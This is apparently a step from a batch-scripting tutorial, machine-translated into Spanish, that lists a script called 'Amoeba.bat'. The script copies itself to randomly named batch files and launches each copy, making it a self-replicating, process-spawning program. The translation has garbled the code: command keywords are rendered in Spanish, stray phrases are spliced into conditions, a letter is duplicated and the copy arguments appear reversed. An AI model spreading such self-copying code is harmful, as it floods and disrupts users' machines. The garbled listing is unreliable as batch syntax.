Paso 2: La ameba fabuloso
El guión va como esto:
de
color 02
título ameba
Set/a vida = 2
: Parte superior
Si % vida % == () 0
cambiar el nombre de %name%.dat %0
)
nombre =
: Lazo
Set/a namenumber = % RANDOM % / (32767 / 25)
Set/a namenumber = % RANDOM % / (32767 / 25)
Set/a namenumber = % RANDOM % / (32767 / 25)
Si % namenumber % == 0 nombre = un % nombre %
Si % namenumber % == 1 nombre = B % nombre %
Si % namenumber % == 2 nombre = D % nombre %
Si % namenumber % == 3 nombre = D % nombre %
Si % namenumber % == nombre del conjunto de 4 = E % nombre %
Si % namenumber % == 5 nombre = F % nombre %
Si % namenumber % == 6 nombre = G % nombre %
Si % namenumber % == 7 nombre = H % nombre %
Si % namenumber % == 8 Nombre = I % nombre %
Si % namenumber % == 9 nombre = J % nombre %
Si % namenumber % == 10 nombre = K % nombre %
Si % namenumber % == 11 nombre = L % nombre %
Si % namenumber % == 12 nombre = M % nombre %
Si % namenumber % == 13 nombre = nombre de N %
Si % namenumber % == 14 nombre = O % nombre %
Si % namenumber % == nombre del conjunto de 15 = P % nombre %
Si % namenumber % == 16 nombre = Q % nombre %
Si % namenumber % == 17 nombre = R % nombre %
Si % namenumber % == nombre del conjunto de 18 = S % nombre %
Si % namenumber % == 19 nombre = T % nombre %
Si % namenumber % == 20 nombre = U % nombre %
Si % namenumber % == 21 nombre = V % nombre %
Si % namenumber % == 22 nombre = W % nombre %
Si % namenumber % == nombre del conjunto de 23 = X % nombre %
Si % namenumber % == 24 nombre = Y % nombre %
Si % namenumber % == 25 nombre = Z % nombre %
Si existen %name%.bat goto bucle
Si existen %name%.dat goto bucle
copiar %name%.bat %0 > nul
Inicio/min %name%.bat
Set/a vida = vida % -1
Goto Top
Guardar una vez más, como "Amoeba.bat".